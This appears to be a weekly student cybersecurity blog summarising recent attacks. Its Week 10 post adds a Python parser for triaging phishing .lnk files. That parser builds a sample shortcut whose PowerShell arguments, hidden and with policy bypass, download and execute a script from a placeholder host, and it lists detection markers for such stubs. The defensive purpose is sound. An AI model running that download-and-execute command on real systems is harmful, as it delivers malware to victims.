Posts

Week 12: Fake TikTok Shop delivering malware

Hackers have created a large number of phishing sites which are made to look like the official TikTok Shop. They are offering "products" in exchange for crypto. Additionally, the pages seem to contain a variant of the cross-platform malware called SparkKitty, which is capable of scraping data from iOS and Android devices. Through this the hackers are also able to steal credentials and purchase more. Resources: https://thehackernews.com/2025/08/15000-fake-tiktok-shop-domains-deliver.html

Week 11: Saint Paul Cyber Attack

The National Guard was called in last Friday, July 25th, in Saint Paul, Minnesota due to a large-scale cyber attack which knocked out online payments to the city as well as some library services. Supposedly the National Guard was called in to provide extra cyber resources, alongside Minnesota Information Technology Services and an unnamed third party. From the reporting around this incident and the seemingly widespread effect, we can assume it was rather serious. There has been limited reporting since the attack, which leads me to believe they have yet to find out who carried it out or how. There has been little public discussion, much less uproar, about the hack, so maybe we will never know. Could probably ask the cyber department at metro but idk I'm a little lazy. https://cyberr3sblog.blogspot.com/2025/08/week-11-saint-paul-cyber-attack.html

Week 10: Spear Phishing in Turkey with LNK Files

Phishing has taken on a new dimension in the last few years: using LNK files (Microsoft-specific shortcut files that point from one file to another). The purpose of these files in the attack is specifically to open PowerShell and run a command that downloads more malware from an online server. The group Patchwork has been associated with the recent LNK spear phishing attacks against defense contractors in Turkey specifically. Since 2009 the malware group has been suspected of associating with the State of India, making them a formidable threat. References: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
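As an added example (not code from the McAfee write-up or from this blog), here is a minimal triage parser for Shell Link (.lnk) files: it checks the header, skips the optional ID list and LinkInfo structures, and pulls out the StringData fields (relative target path, working directory, command-line arguments) that downloader-style shortcuts use to start PowerShell, then lists the indicators a defender would flag. The indicator lists and the sample LNK bytes are constructed for the example; a full parser would also resolve the target from the LinkTargetIDList, which this one only skips over.

```python
"""Triage of Windows Shell Link (.lnk) files, written as an added example.
It reads the ShellLinkHeader, skips the optional ID list and LinkInfo
structures, and pulls out the StringData fields (target path, working
directory, command-line arguments) that phishing LNKs use to launch
PowerShell.  The sample LNK bytes below are constructed here, not captured."""
import struct

# Header layout from the MS-SHLLINK specification (little-endian).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight

STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))

# Indicators a defender looks for; hypothetical lists, tune to your environment.
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
           "rundll32", "certutil", "bitsadmin")
ARG_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
               "invoke-webrequest", "iex", "invoke-expression", "-enc",
               "frombase64string", "bypass", "hidden")


def _string_data(text, unicode):
    """StringData entry: CountCharacters (uint16) followed by the characters."""
    encoded = text.encode("utf-16-le") if unicode else text.encode("cp1252")
    return struct.pack("<H", len(text)) + encoded


def build_lnk(relative_path, arguments, show_command=1, unicode=True):
    """Assemble a minimal .lnk (header + StringData only) for testing the parser."""
    flags = HAS_REL_PATH | HAS_ARGS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + _string_data(relative_path, unicode) + _string_data(arguments, unicode)


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a Shell Link file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:          # LinkTargetIDList: uint16 size, then the ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfo: uint32 total size including itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
        pos += nbytes
    return fields


def assess(fields):
    """List the reasons a parsed LNK looks like a PowerShell downloader stub."""
    findings = []
    target = (fields.get("relative_path", "") + " " + fields.get("working_dir", "")).lower()
    args = fields.get("arguments", "").lower()
    for binary in LOLBINS:
        if binary in target:
            findings.append(f"target launches {binary}")
    for marker in ARG_MARKERS:
        if marker in args:
            findings.append(f"arguments contain '{marker}'")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("window is opened minimized (SW_SHOWMINNOACTIVE)")
    if len(args) > 200:
        findings.append(f"unusually long argument string ({len(args)} chars)")
    return findings


def triage(data):
    fields = parse_lnk(data)
    return fields, assess(fields)


# Constructed samples: a downloader-style shortcut and an ordinary document link.
SAMPLE_MALICIOUS = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')\"",
    show_command=SW_SHOWMINNOACTIVE,
)
SAMPLE_BENIGN = build_lnk(r"..\Documents\report.docx", "")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        fields, findings = triage(blob)
        print(label, fields.get("relative_path"), findings or ["no indicators"])
```

In practice you would run `triage()` over the bytes of attachments pulled from a mail gateway or quarantine, and treat any finding that pairs a scripting host with a URL or decode marker as worth a closer look; the ShowCommand check alone is only a weak signal, since legitimate shortcuts also use it.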

Week 9: Massistant Tool Allows Secret Extraction from Mobile Devices

This is a slightly concerning tool that has been made public by Lookout and reported on by The Hacker News. The tool Massistant, developed by the Chinese company Meiya Pico, allows law enforcement (or anyone who gets their hands on it) to extract photos, SMS messages, and GPS data from mobile devices. The assumption is that the tool will be primarily used at border crossings, allowing LE to compromise the device and extract data without the knowledge of the mobile owner. Maybe most surprising is that Meiya Pico claims Massistant has the ability to collect data from end-to-end encrypted (E2E) apps like Telegram and Signal. References: https://thehackernews.com/2025/07/chinas-massistant-tool-secretly.html

Week 8: Chrome and Edge browser extensions turn trojan, harm millions

Eighteen browser extensions for Google's Chrome and Microsoft's Edge have been identified as malicious trojan horse type viruses harming an estimated 2.3 million users. For reference, a trojan virus takes its name from the Greek myth of the Trojan War, in which a large wooden horse was presented as a gift to the city of Troy. When the Trojans brought the gift past their large walls, enemy soldiers jumped out. In our case today a trojan virus is a piece of software which presents as something beneficial to the user but later reveals itself to be malicious. Specifically, the extension Colour Picker Tool--Geco was verified by Google and had over 800 ratings in the store with an average rating of 4.2 (an impressive piece of malware). The researcher who analyzed the malware stated, "[t]his is a carefully crafted Trojan horse that delivers exactly what it promises...while simultaneously hijacking your browser, tracking every website you visit, and maintaining a persistent command and c...

Week 7: Google Begins Using Quantum Encryption

The Hacker News reported, in February, that Google's cloud Key Management Service would begin using quantum encryption for its digital signatures. This is the future of a technological process we have been studying this week, digital encryption, a long-standing problem not just in cyber work but in communication in general. Encryption is often traced back to Roman times. A code called the "Caesar Cipher" was nothing more than a means of shifting the alphabet; the exact shift would be called the key. Today we use modern encryption standards for most of our digital communication, such as AES-256 and RSA. These methods utilize large prime number multiplication and remainder math to create a key which is virtually impossible to crack with a classical computer. However, advances in mathematics (specifically Shor's algorithm) and quantum computing have led to research into "post-quantum encryption" (PQE). This is what ...
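To make the two historical steps above concrete, here is an added example (not from the Hacker News article or this blog) of both toy ciphers: a Caesar shift, where the key is nothing more than the shift amount, and textbook RSA, where the key comes from multiplying two primes and doing remainder math. Both are broken on purpose: the Caesar key is recovered by trying all 25 shifts, and the RSA private key falls out as soon as n is factored, which is exactly the step Shor's algorithm makes fast on a quantum computer. The primes and messages are constructed, and the RSA has no padding, so it is for illustration only.

```python
"""Two toy ciphers behind the history above, written as an added example:
the Caesar shift (key = the shift) and textbook RSA (key from two primes and
modular arithmetic).  Both are small enough to break on purpose: the Caesar
key space is exhausted by trying 25 shifts, and the RSA private key falls out
as soon as n is factored, which is exactly the step Shor's algorithm speeds
up on a quantum computer.  Numbers here are constructed, not real keys."""
import string
from math import gcd

ALPHABET = string.ascii_uppercase


def caesar(text, shift):
    """Shift every letter by `shift` positions; other characters pass through."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_brute_force(ciphertext, crib):
    """Try all 25 non-trivial shifts; return (key, plaintext) when a known word appears."""
    for shift in range(1, 26):
        candidate = caesar(ciphertext, -shift)
        if crib.upper() in candidate:
            return shift, candidate
    return None


def rsa_keygen(p, q, e=17):
    """Textbook RSA: n = p*q, d = e^-1 mod (p-1)(q-1). No padding, toy sizes only."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    return (n, e), (n, pow(e, -1, phi))  # (public, private)


def rsa_encrypt(public, m):
    n, e = public
    return pow(m, e, n)


def rsa_decrypt(private, c):
    n, d = private
    return pow(c, d, n)


def factor_by_trial(n):
    """Trial division stands in for Shor's algorithm; only feasible because n is tiny."""
    for p in range(2, int(n ** 0.5) + 1):
        if n % p == 0:
            return p, n // p
    return None


def recover_private_key(public):
    """Given only the public key, factor n and rebuild d: why factoring breaks RSA."""
    n, e = public
    p, q = factor_by_trial(n)
    return n, pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    ct = caesar("ATTACK AT DAWN", 3)
    print(ct, caesar_brute_force(ct, "DAWN"))
    pub, priv = rsa_keygen(61, 53)
    c = rsa_encrypt(pub, 65)
    print(c, rsa_decrypt(priv, c), recover_private_key(pub) == priv)
```

The point of `recover_private_key` is the contrast in cost: trial division on a 12-bit n finishes instantly, while on a 2048-bit RSA modulus no classical method is known to finish in any useful time, and that gap is the whole security margin that Shor's algorithm would erase.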

Week 6: Top Black Hat Hacker "Intel Broker" Arrested

Yesterday, June 25th, a 25-year-old British man named Kai West was arrested in a years-long investigation that culminated in a sting operation to discover the identity of the infamous "Intel Broker". He had for years posted and sold compromised data on the website BreachForums. The investigation came to its conclusion when an undercover agent posed as a buyer for stolen data. The payment was sent to Intel Broker's BTC (bitcoin) address, which was allegedly tied to his Coinbase account. This strikes me as pretty odd and even a little funny. I am sure we will learn more as the story develops, but he was one of the most wanted hackers in Europe, yet his opsec was bad enough to use Coinbase when selling top secret data. Something about the story seems a little weird. Most Black Hat hackers use money laundering schemes like Monero at the very minimum to "clean" their money. I don't know anything though, so if someone wants to explain it to me please do. Resources: ht...